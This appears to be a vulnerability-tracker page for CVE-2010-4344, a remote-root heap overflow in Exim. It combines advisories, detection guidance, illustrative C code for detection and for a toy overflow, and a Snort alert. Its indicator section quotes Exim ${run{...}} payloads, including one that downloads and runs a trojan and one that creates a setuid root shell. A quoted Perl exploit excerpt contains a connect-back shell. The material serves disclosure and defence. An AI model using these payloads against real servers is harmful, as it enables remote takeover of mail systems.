CVE-2010-4344
Published 2010-12-14
Priority P1 · 94 · critical · CVSS 3.1 base score 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, remediation due 2022-04-15
Exploited in the wild
EPSS: 71.79% (99.3rd percentile)
Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.
Affected
9 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| debian | debian_linux | — | — |
| debian | exim4 | < exim4 4.70-1 (bookworm) | exim4 4.70-1 (bookworm) |
| exim | exim | < 4.70 | 4.70 |
| opensuse | opensuse | — | — |
| opensuse | opensuse | — | — |
| opensuse | opensuse | — | — |
Detection & IOCs (extracted from sources)
command: spool_directory = ${run{/bin/chown root:root /var/spool/exim4/s}}${run{/bin/chmod 4755 /var/spool/exim4/s}}
command: ${run{/bin/sh -c "exec /bin/sh -c 'wget $trojan -O /tmp/c.pl;perl /tmp/c.pl $myip $myport; sleep 10000000'"}}
snort: SID 124:2:1
- Snort's SMTP preprocessor SID 124:2:1 fires on SMTP DATA header lines longer than its configured max_header_line_len. The public PoC's 2896-byte header comfortably exceeds the 1000-byte value in the shipped snort.conf, so the rule fires with default settings and no custom configuration.
- Alert on SMTP DATA headers exceeding ~2896 characters; the PoC triggers the alert '(smtp) Attempted data header buffer overflow: 2896 chars'.
- The exploit requires two MAIL FROM commands in a single SMTP session: the first delivers the oversized message (logging the rejected message's headers is what overflows the heap buffer), the second makes Exim run expand_string over the ACL that the overflow overwrote, executing the injected payload.
- Look for Exim ${run{...}} expansion strings embedded inside SMTP message headers; this is the payload delivery mechanism used to execute shell commands.
- Detect oversized SMTP DATA messages (exceeding the server's advertised SIZE limit by 256 KB) sent to trigger the rejection-log heap overflow; the Metasploit module sets msg_len = max_msg + 1024*256.
- Caveat: SID 124:2:1 only fires when max_header_line_len is smaller than the attacking header line (2896 bytes for the PoC). The shipped snort.conf sets it to 1000; operators who raised it above the attack's header length, or set it to 0 (which disables the length check), will miss the attack.
- Caveat: the heap overflow is only reached when Exim logs the headers of rejected messages (the rejected_header log selector, on by default). Deployments that have removed it from log_selector in the Exim configuration are not exploitable via this specific vector.
- Caveat: the Metasploit module checks the banner against /Exim 4\.6\d+/ and aborts with a warning for other version strings unless SkipVersionCheck is set, so detection based solely on the banner version may miss patched or differently versioned installs.
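The indicators listed above, folded into one transcript-level check. This is an added example written for this page, not a Snort rule and not Exim code: it walks an SMTP session transcript (one message per line, "C: " for client, "S: " for server), counts MAIL FROM commands, measures DATA header lines against the same 1000-byte threshold the shipped snort.conf uses, looks for `${run{` inside headers, and compares the bytes sent in DATA with the SIZE the server advertised. The sample session, its hostnames and its server replies are constructed for the demo.

```c
/* Heuristic detector for the CVE-2010-4344 exploitation pattern, run over an
 * SMTP session transcript with one message per line ("C: " client, "S: " server).
 * Added illustration: not a Snort rule and not Exim code. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_HEADER_LINE 1000  /* same number as max_header_line_len in the shipped snort.conf */

struct findings {
    int mail_from;          /* MAIL FROM commands seen; the exploit needs two */
    int long_headers;       /* DATA header lines longer than MAX_HEADER_LINE */
    size_t longest_header;
    int run_expansions;     /* header lines carrying an Exim "${run{" expansion */
    long advertised_size;   /* 250-SIZE from the EHLO reply, -1 if absent */
    long data_bytes;        /* bytes between DATA and the terminating ".", CRLF counted */
    int oversized_data;     /* data_bytes exceeds advertised_size */
};

/* Bounded substring search; transcript lines are not NUL-terminated. */
static int contains(const char *hay, size_t n, const char *needle)
{
    size_t m = strlen(needle);
    for (size_t i = 0; i + m <= n; i++)
        if (memcmp(hay + i, needle, m) == 0) return 1;
    return 0;
}

/* Fills *f and returns how many of the four indicators fired (0 = clean).
 * Commands are matched case-sensitively to keep the example short. */
int analyze_session(const char *transcript, struct findings *f)
{
    int in_data = 0, in_headers = 0;
    memset(f, 0, sizeof *f);
    f->advertised_size = -1;
    for (const char *line = transcript; *line; ) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        size_t blen = len > 3 ? len - 3 : 0;        /* length after the "C: " / "S: " prefix */
        const char *body = line + (len - blen);
        if (strncmp(line, "S: ", 3) == 0) {
            if (strncmp(body, "250-SIZE ", 9) == 0) f->advertised_size = atol(body + 9);
        } else if (!in_data) {
            if (strncmp(body, "MAIL FROM:", 10) == 0) f->mail_from++;
            else if (blen == 4 && memcmp(body, "DATA", 4) == 0) in_data = in_headers = 1;
        } else if (blen == 1 && body[0] == '.') {
            in_data = in_headers = 0;
        } else {
            f->data_bytes += (long)blen + 2;
            if (in_headers && blen == 0) in_headers = 0;   /* blank line ends the header block */
            else if (in_headers) {
                if (blen > MAX_HEADER_LINE) f->long_headers++;
                if (blen > f->longest_header) f->longest_header = blen;
                if (contains(body, blen, "${run{")) f->run_expansions++;
            }
        }
        line = nl ? nl + 1 : line + len;
    }
    f->oversized_data = f->advertised_size >= 0 && f->data_bytes > f->advertised_size;
    return (f->mail_from >= 2) + (f->long_headers > 0) + (f->run_expansions > 0) + f->oversized_data;
}

int indicator_count(const char *t) { struct findings f; return analyze_session(t, &f); }
struct findings inspect(const char *t) { struct findings f; analyze_session(t, &f); return f; }

static void put(char *buf, size_t *n, const char *s) { size_t l = strlen(s); memcpy(buf + *n, s, l); *n += l; }

/* Constructed sample: the server advertises a 2048-byte SIZE; the client sends an
 * overlong header carrying ${run{...}}, a body that pushes the message past the
 * limit, and then the second MAIL FROM. Hostnames and replies are invented. */
const char *sample_session(void)
{
    static char buf[8192];
    static size_t n;
    if (n) return buf;
    put(buf, &n, "S: 220 mx.example.test ESMTP\nC: EHLO attacker.test\n"
                 "S: 250-mx.example.test\nS: 250-SIZE 2048\nS: 250 HELP\n"
                 "C: MAIL FROM:<a@attacker.test>\nS: 250 OK\n"
                 "C: RCPT TO:<postmaster@example.test>\nS: 250 Accepted\n"
                 "C: DATA\nS: 354 Enter message\nC: X-Pad: ${run{/bin/sh -c 'id'}}");
    memset(buf + n, 'A', 1200); n += 1200;             /* header line becomes 1230 bytes */
    put(buf, &n, "\nC: \nC: ");
    memset(buf + n, 'B', 1000); n += 1000;             /* body: DATA totals 2236 bytes > 2048 */
    put(buf, &n, "\nC: .\nS: 552 Message size exceeds fixed maximum size\n"
                 "C: MAIL FROM:<b@attacker.test>\n");
    buf[n] = '\0';
    return buf;
}

/* Constructed benign session for comparison. */
const char *BENIGN_SESSION =
    "S: 220 mx.example.test ESMTP\nC: EHLO client.example.test\n"
    "S: 250-mx.example.test\nS: 250-SIZE 2048\nS: 250 HELP\n"
    "C: MAIL FROM:<alice@example.test>\nS: 250 OK\nC: RCPT TO:<bob@example.test>\nS: 250 Accepted\n"
    "C: DATA\nS: 354 Enter message\nC: Subject: hello\nC: \nC: Just checking in.\nC: .\nS: 250 OK\nC: QUIT\n";

int main(void)
{
    struct findings f;
    int hits = analyze_session(sample_session(), &f);
    printf("indicators=%d MAIL FROM=%d long headers=%d (max %zu) run expansions=%d data=%ld SIZE=%ld\n",
           hits, f.mail_from, f.long_headers, f.longest_header, f.run_expansions, f.data_bytes, f.advertised_size);
    printf("benign session indicators=%d\n", indicator_count(BENIGN_SESSION));
    return 0;
}
```

Each indicator is weak on its own (a 1200-byte Received: chain or a single oversize message is ordinary mail), which is why the function reports a count rather than a verdict; two MAIL FROM commands in one session combined with a `${run{` header is the combination worth paging on.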
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 9.3 | CRITICAL | AV:N/AC:M/Au:N/C:C/I:C/A:C |
| osv | — | 9.8 | CRITICAL | — |
| vulncheck | — | 9.8 | CRITICAL | — |
| cisa | — | 9.8 | CRITICAL | — |
| vendor_debian | — | 9.8 | CRITICAL | — |
| vendor_redhat | — | 9.8 | CRITICAL | — |
GHSA
GHSA-mvgg-qcrq-7wr8: Heap-based buffer overflow in the string_vformat function in string
ghsa_unreviewed·2022-05-17
CVE-2010-4344 [HIGH] CWE-119 GHSA-mvgg-qcrq-7wr8: Heap-based buffer overflow in the string_vformat function in string
Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.
OSV
CVE-2010-4344: Heap-based buffer overflow in the string_vformat function in string
osv·2010-12-14·CVSS 9.8
CVE-2010-4344 [CRITICAL] CVE-2010-4344: Heap-based buffer overflow in the string_vformat function in string
Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.
VulnCheck
Exim Heap-Based Buffer Overflow Vulnerability
vulncheck·2010·CVSS 9.8
CVE-2010-4344 [CRITICAL] CWE-119 Exim Heap-Based Buffer Overflow Vulnerability
Exim Heap-Based Buffer Overflow Vulnerability
Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session.
Affected: Exim Exim
Required Action: Apply updates per vendor instructions.
Exploitation References: https://lists.exim.org/lurker/message/20101210.164935.385e04d0.en.html; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json
Remediation Due: 2022-04-15
CISA
Exim Heap-Based Buffer Overflow Vulnerability
cisa·2022-03-25·CVSS 9.8
CVE-2010-4344 [CRITICAL] CWE-119 Exim Heap-Based Buffer Overflow Vulnerability
Vulnerability: Exim Heap-Based Buffer Overflow Vulnerability
Affected: Exim Exim
Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2010-4344
Remediation Due Date: 2022-04-15
Ubuntu
Exim vulnerability
vendor_ubuntu·2010-12-11
CVE-2010-4344 Exim vulnerability
Title: Exim vulnerability
Summary: A remote attacker could send crafted email to gain root access.
Sergey Kononenko and Eugene Bujak discovered that Exim did not correctly
truncate string expansions. A remote attacker could send specially crafted
email traffic to run arbitrary code as the Exim user, which could also
lead to root privileges.
Instructions: In general, a standard system update will make all the necessary changes.
Red Hat
exim: remote code execution flaw
vendor_redhat·2010-12-07·CVSS 9.8
CVE-2010-4344 [CRITICAL] CWE-78 exim: remote code execution flaw
exim: remote code execution flaw
Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.
Debian
CVE-2010-4344: exim4 - Heap-based buffer overflow in the string_vformat function in string.c in Exim be...
vendor_debian·2010·CVSS 9.8
CVE-2010-4344 [CRITICAL] CVE-2010-4344: exim4 - Heap-based buffer overflow in the string_vformat function in string.c in Exim be...
Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.
Scope: local
bookworm: resolved (fixed in 4.70-1)
bullseye: resolved (fixed in 4.70-1)
forky: resolved (fixed in 4.70-1)
sid: resolved (fixed in 4.70-1)
trixie: resolved (fixed in 4.70-1)
Exploit-DB
Exim4 < 4.69 - string_format Function Heap Buffer Overflow (Metasploit)
exploitdb·2010-12-16
CVE-2010-4345 Exim4 < 4.69 - string_format Function Heap Buffer Overflow (Metasploit)
This module exploits a heap buffer overflow within versions of Exim prior to
version 4.69. By sending a specially crafted message, an attacker can corrupt the
heap and execute arbitrary code with the privileges of the Exim daemon.
The root cause is that no check is made to ensure that the buffer is not full
prior to handling '%s' format specifiers within the 'string_vformat' function.
In order to trigger this issue, we get our message rejected by sending a message
that is too large. This will call into log_write to log rejection headers (which
is a default configuration setting). After filling the buffer, a long header
string is sent. In a successful attempt, it overwrites the ACL for the 'MAIL
FROM' command. By sending a second message, the string we sent will be evaluat
Exploit-DB
Exim 4.63 - Remote Command Execution
exploitdb·2010-12-11
CVE-2010-4344 Exim 4.63 - Remote Command Execution
Exim 4.63 - Remote Command Execution
---
```perl
#Exim 4.63 (RedHat/Centos/Debian) Remote Root Exploit by Kingcope
#Modified perl version of metasploit module
=for comment
use this connect back shell as "trojanurl" and be sure to setup a netcat,
---snip---
$system = '/bin/sh';
$ARGC=@ARGV;
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
open FILE, ">/var/spool/exim4/s.c";
print FILE qq{
#include
#include
int main(int argc,
```
Metasploit
Exim4 string_format Function Heap Buffer Overflow
metasploit·CVSS 7.8
[HIGH] Exim4 string_format Function Heap Buffer Overflow
Exim4 string_format Function Heap Buffer Overflow
This module exploits a heap buffer overflow within versions of Exim prior to version 4.69. By sending a specially crafted message, an attacker can corrupt the heap and execute arbitrary code with the privileges of the Exim daemon. The root cause is that no check is made to ensure that the buffer is not full prior to handling '%s' format specifiers within the 'string_vformat' function. In order to trigger this issue, we get our message rejected by sending a message that is too large. This will call into log_write to log rejection headers (which is a default configuration setting). After filling the buffer, a long header string is sent. In a successful attempt, it overwrites the ACL for the 'MAIL FROM' command. By sending a second message, t
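The root cause described in the two Metasploit write-ups above (the Exploit-DB mirror and the module entry), reduced to a runnable model. This is an added illustration, not Exim's string.c and not the Metasploit module: a tiny printf-style formatter whose `%s` handler copies its argument without checking how much room is left, beside the bounded version that truncates. The buffer sizes, the "rejected header: " prefix, the header contents and the layout (a log buffer with an "ACL" string directly behind it in one heap allocation) are assumptions chosen so the overwrite is deterministic; in real Exim the heap adjacency the exploit relies on depends on allocator state.

```c
/* Simplified re-creation of the bug class behind CVE-2010-4344: a printf-style
 * formatter whose "%s" handler copies its argument without checking how much
 * room is left in the output buffer. Added illustration; not Exim's string.c
 * and not the Metasploit module. Only "%s" is handled; everything else in the
 * format string is copied literally. */
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LOG_SZ 64   /* assumed size of the "rejection log line" buffer */
#define ACL_SZ 64   /* assumed size of the "MAIL FROM ACL" string behind it */

/* bounded=0: the missing check (vulnerable). bounded=1: truncate to what fits.
 * Returns the number of bytes written, NUL excluded. */
static size_t toy_vformat(char *buf, size_t size, int bounded, const char *fmt, va_list ap)
{
    char *p = buf, *end = buf + size - 1;          /* last byte reserved for the NUL */
    for (const char *f = fmt; *f; f++) {
        if (f[0] == '%' && f[1] == 's') {
            const char *s = va_arg(ap, const char *);
            size_t slen = strlen(s);
            if (bounded && slen > (size_t)(end - p)) slen = (size_t)(end - p);
            memcpy(p, s, slen);                     /* unbounded copy when bounded == 0 */
            p += slen;
            f++;
        } else {
            if (bounded && p >= end) break;
            *p++ = *f;
        }
    }
    *p = '\0';
    return (size_t)(p - buf);
}

static size_t toy_format(char *buf, size_t size, int bounded, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    size_t n = toy_vformat(buf, size, bounded, fmt, ap);
    va_end(ap);
    return n;
}

struct outcome {
    size_t written;     /* bytes the formatter produced */
    int acl_corrupted;  /* did the neighbouring ACL string change? */
    char acl[ACL_SZ];   /* the ACL string after logging */
};

/* Constructed header: filler sized so the expansion lands exactly where the
 * ACL begins, then an Exim ${run{...}} expansion as the payload. */
static const char *crafted_header(void)
{
    static char hdr[128];
    size_t pad = LOG_SZ - strlen("rejected header: ");   /* 47 bytes */
    memset(hdr, 'A', pad);
    strcpy(hdr + pad, "${run{/bin/sh -c id}}");
    return hdr;
}

/* One heap allocation holds the log buffer with the ACL string right behind it,
 * standing in for the heap adjacency the real exploit relies on. */
struct outcome run_demo(int bounded)
{
    struct outcome o = {0};
    char *region = calloc(1, LOG_SZ + ACL_SZ);
    char *acl = region + LOG_SZ;
    strcpy(acl, "accept");                            /* the admin's benign ACL */
    o.written = toy_format(region, LOG_SZ, bounded, "rejected header: %s", crafted_header());
    o.acl_corrupted = strcmp(acl, "accept") != 0;
    memcpy(o.acl, acl, ACL_SZ);
    free(region);
    return o;
}

/* Convenience accessor returning the ACL string after the demo. */
const char *acl_after(int bounded)
{
    static struct outcome o;
    o = run_demo(bounded);
    return o.acl;
}

int main(void)
{
    struct outcome v = run_demo(0), h = run_demo(1);
    printf("unbounded: wrote %zu bytes, ACL is now \"%s\"\n", v.written, v.acl);
    printf("bounded:   wrote %zu bytes, ACL still \"%s\"\n", h.written, h.acl);
    return 0;
}
```

With the check missing, logging one 68-byte header writes 85 bytes into a 64-byte buffer and the string that used to read `accept` now reads `${run{/bin/sh -c id}}`; the next time that ACL is expanded, the payload runs. The bounded variant stops at 63 bytes and leaves the neighbour untouched, which is the shape of the fix shipped in 4.70.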
Talos
Exim Remote Root
blogs_talos·2010-12-14·CVSS 9.8
CVE-2010-4344 [CRITICAL] Exim Remote Root
We've heard from a number of Sourcefire customers and open-source Snort users lately, asking us whether we'll be releasing coverage for last week's Exim remote root (CVE-2010-4344 for those keeping score at home). Based on what hit the Exim-dev mailing list, we felt confident that the SMTP preprocessor would catch the vulnerability; after testing with the proof-of-concept sent to the Full-Disclosure mailing list on Saturday, we've confirmed that SID 124:2:1 does the job nicely:
```
# ~/snort-2.9.0$ src/snort -c etc/snort.2900.conf -q -A cmg -r ~/pcaps/cve-2010-4344-full-disclosure.pcap
12/14-09:15:37.145472 [**] [124:2:1] (smtp) Attempted data header buffer overflow: 2896 chars [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 10.1.11.11:35781 -> 10.1.11.11
```
Bugzilla
CVE-2010-4344 exim: remote code execution flaw
bugzilla·2010-12-09·CVSS 9.8
CVE-2010-4344 [CRITICAL] CVE-2010-4344 exim: remote code execution flaw
CVE-2010-4344 exim: remote code execution flaw
There is a possible remote root flaw in Exim:
http://www.exim.org/lurker/message/20101207.215955.bb32d4f2.en.html
We do not currently know more than is contained in this mail. We will
update this bug with further information as it is discovered.
Discussion:
There are two bugs here. First a remote exploit where the attacker somehow tricks Exim into evaluating data it shouldn't, and honouring a ${run {/bin/sh...}} directive which ends up giving the attacker a shell.
Secondly a privilege escalation where the trusted 'exim' user is able to tell Exim to use arbitrary config files, in which further ${run ...} commands will be invoked as root.
The latter should be addressed by the patch at http://lists.exim.org/lurker/message/20101209.172233.ab
References
- ftp://ftp.exim.org/pub/exim/ChangeLogs/ChangeLog-4.70
- http://atmail.com/blog/2010/atmail-6204-now-available/
- http://bugs.exim.org/show_bug.cgi?id=787
- http://git.exim.org/exim.git/commit/24c929a27415c7cfc7126c47e4cad39acf3efa6b
- http://lists.exim.org/lurker/message/20101210.164935.385e04d0.en.html
- http://lists.opensuse.org/opensuse-security-announce/2010-12/msg00003.html
- http://openwall.com/lists/oss-security/2010/12/10/1
- http://secunia.com/advisories/40019
- http://secunia.com/advisories/42576
- http://secunia.com/advisories/42586
- http://secunia.com/advisories/42587
- http://secunia.com/advisories/42589
- http://www.cpanel.net/2010/12/exim-remote-memory-corruption-vulnerability-notification-cve-2010-4344.html
- http://www.debian.org/security/2010/dsa-2131
- http://www.exim.org/lurker/message/20101207.215955.bb32d4f2.en.html
- http://www.kb.cert.org/vuls/id/682457
- http://www.metasploit.com/modules/exploit/unix/smtp/exim4_string_format
- http://www.openwall.com/lists/oss-security/2021/05/04/7
- http://www.osvdb.org/69685
- http://www.redhat.com/support/errata/RHSA-2010-0970.html
- http://www.securityfocus.com/archive/1/515172/100/0/threaded
- http://www.securityfocus.com/bid/45308
- http://www.securitytracker.com/id?1024858
- http://www.theregister.co.uk/2010/12/11/exim_code_execution_peril/
- http://www.ubuntu.com/usn/USN-1032-1
- http://www.vupen.com/english/advisories/2010/3171
- http://www.vupen.com/english/advisories/2010/3172
- http://www.vupen.com/english/advisories/2010/3181
- http://www.vupen.com/english/advisories/2010/3186
- http://www.vupen.com/english/advisories/2010/3204
- http://www.vupen.com/english/advisories/2010/3246
- http://www.vupen.com/english/advisories/2010/3317
- https://bugzilla.redhat.com/show_bug.cgi?id=661756
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2010-4344
Timeline
- 2010-12-14: Published
- 2022-03-25: Added to CISA KEV
- Exploited in the wild